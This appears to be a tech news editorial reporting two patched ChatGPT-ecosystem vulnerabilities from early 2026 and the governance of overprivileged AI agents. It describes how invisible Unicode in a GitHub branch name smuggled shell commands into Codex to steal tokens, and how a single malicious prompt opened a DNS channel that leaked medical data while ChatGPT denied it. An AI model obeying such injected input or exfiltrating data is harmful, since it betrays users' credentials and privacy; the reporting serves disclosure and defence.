The Trust Problem: ChatGPT's Security Failures and What They Mean for Everyone Using It

14 Apr

A developer in a shared codebase runs a routine task. Somewhere in that repository sits a branch with an unremarkable name. The name is not what it appears to be. Invisible Unicode characters conceal a shell command inside it. The moment the AI coding agent processes the branch, it executes the payload, harvests the developer's GitHub authentication token, and forwards it silently to a server the developer has never heard of. No alert. No warning. The token is already gone.

This is not a hypothetical. It is one of three major security failures involving OpenAI's ChatGPT ecosystem that researchers brought to light in early 2026. A critical command injection flaw in the Codex coding agent enabled the theft of GitHub credentials at scale. A hidden DNS-based channel within ChatGPT's code execution runtime could silently exfiltrate conversation data and uploaded files without warning to the user. And underpinning both technical findings is a broader governance failure: enterprises are deploying AI agents with privileges far exceeding what those agents need, with little visibility into what they are actually doing. OpenAI has since patched both vulnerabilities, but the disclosures reveal how much of the security model around AI platforms rests on assumptions that do not hold.

A Branch Name That Became a Backdoor

OpenAI Codex is a cloud-based coding assistant built into ChatGPT. Developers connect GitHub repositories, issue prompts, and Codex spins up a managed container to execute tasks, authenticating with a GitHub OAuth token carrying read and write access to repositories, workflows, actions, and pull requests.

BeyondTrust Phantom Labs found that Codex failed to sanitise the GitHub branch name parameter during task creation. Passed directly into container setup scripts without validation, it let an attacker inject shell commands simply by naming a branch accordingly and harvest the agent's GitHub User Access Token. Tyler Jespersen, who led the investigation, explained:

"The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter. This can result in the theft of a victim's GitHub User Access Token, the same token Codex uses to authenticate with GitHub."

Payloads were disguised using Unicode Ideographic Spaces, invisible characters making malicious branches appear identical to a standard main branch. The exploit was fully automatable across any shared repository, and desktop Codex applications also stored credentials in a local auth.json file, creating a second attack path.

Fletcher Davis, Director of Research at BeyondTrust Phantom Labs, said: "AI coding agents like Codex are not just development tools, but privileged identities operating inside live execution environments with direct access to source code, credentials, and infrastructure. When user-controlled input is passed into these environments without strict validation, the result is not just a bug. It is a scalable attack path into enterprise systems." OpenAI classified the issue as Critical Priority 1 and confirmed full remediation by February 5, 2026.

The Conversation That Was Never Private

The same week, Check Point Research disclosed a separate vulnerability. ChatGPT's Python-based code execution runtime is described by OpenAI as a secure, isolated container that cannot generate outbound network requests. Any data sharing through GPT Actions requires explicit user approval. Check Point found that DNS resolution, treated as routine infrastructure traffic, remained fully active inside the container.

By encoding conversation content into DNS subdomain labels, data could be transmitted outward through legitimate resolver infrastructure with no warning, no confirmation, and no recognition by the model that anything was leaving the platform at all. A single malicious prompt activated the channel; every subsequent message became a potential source of leakage. The channel was bidirectional: attackers could send commands back through DNS responses and establish a remote shell inside ChatGPT's Linux execution environment, operating entirely outside the model's safety checks.

Check Point built a proof of concept using a GPT configured as a personal doctor. A user uploaded laboratory test results, described their symptoms, and received a normal-looking medical consultation. The patient's identity and full medical assessment were simultaneously being transmitted to an attacker-controlled server. When asked directly, ChatGPT confidently denied that any data had left the platform.

Eli Smadja, Head of Research at Check Point Research, was direct about the broader lesson: "This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default. As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organisations need independent visibility and layered protection between themselves and AI vendors." OpenAI deployed a fix on February 20, 2026.

Five Hundred Strangers in the Building

Mortada Ayad, Vice President of Sales at Delinea, uses a specific image to describe what AI governance looks like inside most enterprises today. You work in HR. You walk into the office and find 500 people you have never seen before: asking questions, picking up documents, moving through secure areas. Nobody knows who they are or what they are authorised to do. That, he says, is the reality of AI agents in organisations right now. He estimates the ratio of AI and machine identities to human identities inside enterprises now stands at 40 to 1. When he started in the industry, it was 4 or 5 to 1.

Ayad is direct about the geopolitical dimension: "AI is being used as a significant security breach. We cannot avoid it, we cannot ignore it. Attacks are not just happening on a physical front; they are happening on a very deep technological front. ChatGPT is being used, OpenAI is being used, Gemini is being used, and there are many reports coming out on how people are slowly using these to create and facilitate breaches." Generative AI has democratised offensive capabilities in ways with no recent precedent.

As he described it: "I can take AI today, and every morning it will tell me the top five topics I could exploit with spam or phishing, and it will build the entire toolkit for me, something different every day. That is why we saw scammers in the UAE using AI for air travel fraud on the very first day of the conflict. Awareness is the first protection, but we also have to use AI to protect ourselves."

The defensive answer is what Delinea calls zero standing privilege: AI agents should hold only the permissions they need, be accessible only under specific conditions, and have elevation granted only when circumstances explicitly warrant it. In practice, most organisations skip this entirely. Teams request agents, cannot define the exact permissions required, and default to administrative access. Ayad put it plainly: "We don't want to give any identity, human or AI, more permission than they actually need. When you put those guardrails in place, the blast radius of any incident is minimised. But when an AI agent is overprivileged and not secured, and something happens, the blast radius would be very big, and that would be treated as a major incident." The Codex exploit worked precisely because the agent held permissions it never needed. Tighter scoping would not have prevented the vulnerability, but it would have made the stolen credential far less valuable.

What Has Not Been Patched

Both vulnerabilities have been fixed. What remains are the conditions that allow them to persist undetected: the assumption that AI execution environments are isolated when they are not, excessive permissions granted to agents whose scope was never defined, and the absence of governance to catch anomalous behaviour before it becomes a breach. Davis was clear:

"As AI agents become more deeply integrated into developer workflows, the security of the containers they run in and the input they consume must be treated with the same rigour as any other application security boundary. The attack surface is expanding." Jespersen added: "Treat agent containers as strict security boundaries, never trust external provider data formats as inherently safe, and audit AI application permissions to enforce strict least privilege."

Smadja's conclusion applied beyond any single platform: "As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organisations need independent visibility and layered protection between themselves and AI vendors." AI agents are not passive data stores. They hold real credentials, make autonomous decisions, and trigger cascading actions across production systems. Governing them as privileged identities is not a future consideration. It is already overdue.

The Source Code Editorial

The Trust Problem: ChatGPT's Security Failures and What They Mean for Everyone Using It

A Branch Name That Became a Backdoor

The Conversation That Was Never Private

Five Hundred Strangers in the Building

What Has Not Been Patched

How a Single ChatGPT Prompt Could Silently Steal Your Data — and What Check Point Research Found Inside the Runtime